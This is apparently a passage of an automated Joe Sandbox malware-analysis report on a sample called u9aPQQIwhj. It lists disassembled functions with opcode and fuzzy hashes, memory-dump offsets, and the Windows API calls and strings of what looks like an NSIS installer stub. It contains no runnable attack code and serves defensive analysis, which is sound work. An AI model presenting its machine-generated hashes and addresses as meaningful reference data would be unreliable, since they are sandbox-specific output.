Opcode ID: 31c4efb0e882550792501aaed51ae7c3c4a699a126899cb489b4236ec9665d28
Instruction ID: dc103312a447b3d79da8a1d0a74436e717996063520c6d9c1d5ae73227ee2031
Opcode Fuzzy Hash: 31c4efb0e882550792501aaed51ae7c3c4a699a126899cb489b4236ec9665d28
Instruction Fuzzy Hash: 4111F1357001900FE7119A7DD81171EB7EACBCAB14F1588BBE109DB762DA61EC428BD2

Function 39043970 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5714c8c8a4855d25234d650cf5c36ff200f7dc34e206a55743ab842a48e572f
Instruction ID: 1d31055f420a34fa13538f45a54bd9f14cbb99f6be25a852979e73f56b4c6a67
Opcode Fuzzy Hash: e5714c8c8a4855d25234d650cf5c36ff200f7dc34e206a55743ab842a48e572f
Instruction Fuzzy Hash: C321F2B5D01259AFCB00CFAAD884ADEFFF4BF49310F10816AE958A7200C3746954CFA5

Function 3904EE51 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb87e64497c2af60dd44d15d5d8ee85334569663d0666fd47837df61c599559
Instruction ID: 69387adcc270b9933d32197b570f817cbb986b05788ba6745f90b8ac650533e3
Opcode Fuzzy Hash: 9eb87e64497c2af60dd44d15d5d8ee85334569663d0666fd47837df61c599559
Instruction Fuzzy Hash: B901D4343001409FD715D6BED851B6A77D6EBCA760F1488B9E10EDB342DE21EC028B85

Function 00151457 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 714f9858581e68f61579914998d62e68958845008104a403817e9f31d149f6d2
Instruction ID: 3137cc3998c44f0d04c0f518c0b640c7696fe9c2aacf5144f49de982f38c2cab
Opcode Fuzzy Hash: 714f9858581e68f61579914998d62e68958845008104a403817e9f31d149f6d2
Instruction Fuzzy Hash: 62118031A01315DFCF22EFB894512ADBBF1EF48312B24147AEC15EB242E739C8468B91

Function 00151458 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be02d74d3e317979b623b53f38f23166c68d952b46db516e617affcdbd7a790b
Instruction ID: e4e4cf6fcf2eb7ab64b4c8e5a8f355431f0358aa5f5f1d36b93e801551b2cb25
Opcode Fuzzy Hash: be02d74d3e317979b623b53f38f23166c68d952b46db516e617affcdbd7a790b
Instruction Fuzzy Hash: 5A018431A00315DFCF22EFB9945129DBBF5EF48312B14147AEC15EB241E735D8468791

Function 39043CA8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2062e8626013d0b55519ea7687ccc770185832ebc076e5d5f859d47af2df9989
Instruction ID: a9f9bb698845706f7eb587fe3c27973dfa176dec8793be6f1b490cb96b2e5bec
Opcode Fuzzy Hash: 2062e8626013d0b55519ea7687ccc770185832ebc076e5d5f859d47af2df9989
Instruction Fuzzy Hash: FD01B13AB101185FEB549678CC51BEF77EBAFC9740F0405BAD10AE7280DE649C428BD2

Function 000AD02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915454869.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ad000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 138b64bc90e2f89daa3504f7ab799dbf3104cd576096aff02235d5562cb110e1
Instruction ID: 7de827cceef982ea27cc8660f9ed2ff11584b4120edf9dc7a4a6be41384c821c
Opcode Fuzzy Hash: 138b64bc90e2f89daa3504f7ab799dbf3104cd576096aff02235d5562cb110e1
Instruction Fuzzy Hash: 9811DD75504280DFCB11CF54D5C4B15FFB2FB85314F28C6AAD84A4BA56C33AD84ACB62

Function 39043978 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e855f92d5e105e6df0d99a0bf19b902a648570736b0453489b4a2215937e4ee1
Instruction ID: 4280b7c19e4b60cb1cd1710936ae49980b5fb93db8e81fb60139f46721bbc693
Opcode Fuzzy Hash: e855f92d5e105e6df0d99a0bf19b902a648570736b0453489b4a2215937e4ee1
Instruction Fuzzy Hash: 6E11D3B5D01259AFCB00CF9AD984ACEFFB4FB48320F50812AE918A7200C375A954CFA5

Function 39044308 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cba05f353c868ddc982411ec28ea99ff5fad2a67a8a92cbf7d000ca4b6b527b
Instruction ID: 87a3db9271a8912991c485d017756fc2b197d5cbfa4fa4974629ac21c2feeba2
Opcode Fuzzy Hash: 2cba05f353c868ddc982411ec28ea99ff5fad2a67a8a92cbf7d000ca4b6b527b
Instruction Fuzzy Hash: 4C01DC387000101BEB14AA6DE81271FB2CACBC9B15F24883AE10EC7755EE61EC434BC1

Function 3904A3C9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea1dab70e6d53fed3f971e51fdd021114394e5dad75779fd14d4eea617b909d
Instruction ID: b8912a02826ed172e060345fe78799ff7766baacf3e8f4c1ae37d2f18ea4185f
Opcode Fuzzy Hash: dea1dab70e6d53fed3f971e51fdd021114394e5dad75779fd14d4eea617b909d
Instruction Fuzzy Hash: 95017C347040505FE741DA7CD96675E77E6EBCA750B1488B9E20FEB391EA21EC038B92

Function 0015F200 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb7aae8b2dab599f133d2725c8faf0235f0aa103481386da81e02d0fffada0e
Instruction ID: c5689bce3e07fec1d0bdef4d25cebdef8172e6d90d8834eead707589febe8177
Opcode Fuzzy Hash: 3eb7aae8b2dab599f133d2725c8faf0235f0aa103481386da81e02d0fffada0e
Instruction Fuzzy Hash: 13012135300240CFCB2217B9992139A7BA6CBD6251F0404BED41ACF322DA19CC0F87A2

Function 3904EE60 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d85700cdc48707cb1d28f4b22b074858fa2c9160dd2d926e78c4026856964e89
Instruction ID: 94fc5668fe81d918236ece8aa5e6329a467c6bf7cbc13e8b035310027b391188
Opcode Fuzzy Hash: d85700cdc48707cb1d28f4b22b074858fa2c9160dd2d926e78c4026856964e89
Instruction Fuzzy Hash: 91018C357004119BE754966ED891B2F73DAEBC9B60F148839E50ED7341EE21EC034B85

Function 3904A3D8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18a850491dc2c8f89ee509d333b7599341120e78be3712d4c9efd9ea1051ca03
Instruction ID: 0a8d4383796f71608b438df15fca5a59ee31acf8dbbebd46f2b3bce05c193266
Opcode Fuzzy Hash: 18a850491dc2c8f89ee509d333b7599341120e78be3712d4c9efd9ea1051ca03
Instruction Fuzzy Hash: A6011D347004145FE750DA6CD556B5E73D6DBCA754F108879E60FE7380EA25EC024BD6

Function 0015F210 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b3901440f71c201ecc1c36818941d37066ab66b39ab9c6330d4e415a2715f0
Instruction ID: a8aab770978d74fad83606db7cbdb748920ae7142f8ebca02c459cc85b3469a6
Opcode Fuzzy Hash: e1b3901440f71c201ecc1c36818941d37066ab66b39ab9c6330d4e415a2715f0
Instruction Fuzzy Hash: BEF0FA34300215CBCB2166BEE92265BB28ADBC1361F00083EE81ACB314DB26DC0B4391

Function 39046540 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a982f9ca2ffc524b48a3091aab54392da5a3ddd23110e84a42826f86d9d21051
Instruction ID: ccd98ad94d410ed44057a177c3d58e20940045454ce32017f0935565e76f55c1
Opcode Fuzzy Hash: a982f9ca2ffc524b48a3091aab54392da5a3ddd23110e84a42826f86d9d21051
Instruction Fuzzy Hash: 0CF09B71A09284AFDB01DBB4C91934D7BF89B47244F5448F6D445DB142F576ED01DB41

Function 0015E7C1 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84b9f41879bee062366e28cfcc47d06faf8243a9883daf5f0a1f53abe490b62f
Instruction ID: dc72e737fe54f4bf6cded10cef31995744d20e523b50614766be28f0e5b3f37d
Opcode Fuzzy Hash: 84b9f41879bee062366e28cfcc47d06faf8243a9883daf5f0a1f53abe490b62f
Instruction Fuzzy Hash: 0ED0C2609097506FD32A962890446613AC95B49795F9680DAF8664A0829E545959C380

Function 0015E7D0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5b6744e85da2abf2e39573e4029c579062b9186e575f8328d67d8fe7bc16df1
Instruction ID: 22ec3c4ea6f61608e64d5efb0b9e505c4aa8f879de9a21adb82ccbcaff582b65
Opcode Fuzzy Hash: d5b6744e85da2abf2e39573e4029c579062b9186e575f8328d67d8fe7bc16df1
Instruction Fuzzy Hash: 24D05E30605B10DFC328DA68D144A52B7DABB4C711F944419F86787A41CB60BD05CBC0

Non-executed Functions

Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B26
GetDlgItem.USER32(?,00000408), ref: 00404B31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
LoadBitmapW.USER32(0000006E), ref: 00404B8E
SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
DeleteObject.GDI32(00000000), ref: 00404C04
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
ShowWindow.USER32(?,00000005), ref: 00404D5E
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
ImageList_Destroy.COMCTL32(?), ref: 00404F2E
GlobalFree.KERNEL32(?), ref: 00404F3E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
SendMessageW.USER32(?,00001102,?,?), ref: 00405060
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
InvalidateRect.USER32(?,00000000,?), ref: 0040508F
ShowWindow.USER32(?,00000000), ref: 004050DD
GetDlgItem.USER32(?,000003FE), ref: 004050E8
ShowWindow.USER32(00000000), ref: 004050EF

Strings

, xrefs: 004050C7
M, xrefs: 00404CB8
N, xrefs: 00404D99

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
Opcode Fuzzy Hash: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58

Function 00403358 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 335stringfilecomCOMMON

Download Yara Rule

APIs

#17.COMCTL32 ref: 00403377
SetErrorMode.KERNEL32(00008001), ref: 00403382
OleInitialize.OLE32(00000000), ref: 00403389

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033D9
CharNextW.USER32(00000000,00434000,00000020), ref: 00403400
GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 00403509
GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351A
lstrcatW.KERNEL32(00436800,\Temp), ref: 00403526
GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353A
lstrcatW.KERNEL32(00436800,Low), ref: 00403542
SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403553
SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355B
DeleteFileW.KERNEL32(00436000), ref: 0040356F
OleUninitialize.OLE32(?), ref: 0040361F
ExitProcess.KERNEL32 ref: 0040363F
lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364B
lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403657
CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403663
SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366A
DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
CopyFileW.KERNEL32(00437800,0041FE90,?), ref: 004036D8
CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
ExitProcess.KERNEL32 ref: 004037BA

Strings

SeShutdownPrivilege, xrefs: 0040376D
TMP, xrefs: 00403556
\Temp, xrefs: 00403520
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336B
NSIS Error, xrefs: 004033B7
TEMP, xrefs: 0040354E
Low, xrefs: 0040353C
~nsu.tmp, xrefs: 00403645
Error launching installer, xrefs: 004035D6

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-1875889550
Opcode ID: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
Opcode Fuzzy Hash: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

Function 00405770 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00436800,74DF2EE0,00434000), ref: 00405799
lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,74DF2EE0,00434000), ref: 004057E1
lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,74DF2EE0,00434000), ref: 00405804
lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,74DF2EE0,00434000), ref: 0040580A
FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,74DF2EE0,00434000), ref: 0040581A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
FindClose.KERNEL32(00000000), ref: 004058C9

Strings

\*.*, xrefs: 004057DB

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

Function 39047760 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 39047CB8
$^q, xrefs: 39047CC2
$^q, xrefs: 39047CAC
$^q, xrefs: 39047850
$^q, xrefs: 39047881
$^q, xrefs: 3904788D
$^q, xrefs: 39047C19
$^q, xrefs: 39047CCE
$^q, xrefs: 3904785C
$^q, xrefs: 39047C0D

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 3b3adf585211246ae017f5c801752b33db316b27469da52f92d27096db05d5c9
Instruction ID: f578b86aa95ef90021d1148e7d54a23ff2b708042c2e95ad20a1c460f7004e1c
Opcode Fuzzy Hash: 3b3adf585211246ae017f5c801752b33db316b27469da52f92d27096db05d5c9
Instruction Fuzzy Hash: A1122C74A00219CFDB14DF69C994A9DB7F2BF88344F2089B9D409AB355DB30AD86CF91

Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,74DF2EE0,00405790,?,00436800,74DF2EE0), ref: 00406236
FindClose.KERNEL32(00000000), ref: 00406242

Strings

WB, xrefs: 0040622C

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: WB
API String ID: 2295610775-2854515933
Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405330
GetDlgItem.USER32(?,000003EE), ref: 0040533F
GetClientRect.USER32(?,?), ref: 0040537C
GetSystemMetrics.USER32(00000015), ref: 00405384
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
ShowWindow.USER32(?,00000008), ref: 00405420
GetDlgItem.USER32(?,000003EC), ref: 00405441
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
GetDlgItem.USER32(?,000003F8), ref: 0040534E

Part of subcall function 00404162: SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170

GetDlgItem.USER32(?,000003EC), ref: 00405493
CreateThread.KERNEL32(00000000,00000000,Function_00005265,00000000), ref: 004054A1
CloseHandle.KERNEL32(00000000), ref: 004054A8
ShowWindow.USER32(00000000), ref: 004054CC
ShowWindow.USER32(?,00000008), ref: 004054D1
ShowWindow.USER32(00000008), ref: 0040551B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
CreatePopupMenu.USER32 ref: 00405560
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
GetWindowRect.USER32(?,?), ref: 00405594
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
OpenClipboard.USER32(00000000), ref: 004055F5
EmptyClipboard.USER32 ref: 004055FB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
GlobalLock.KERNEL32(00000000), ref: 00405611
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
GlobalUnlock.KERNEL32(00000000), ref: 00405645
SetClipboardData.USER32(0000000D,00000000), ref: 00405650
CloseClipboard.USER32 ref: 00405656

Strings

{, xrefs: 00405539

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
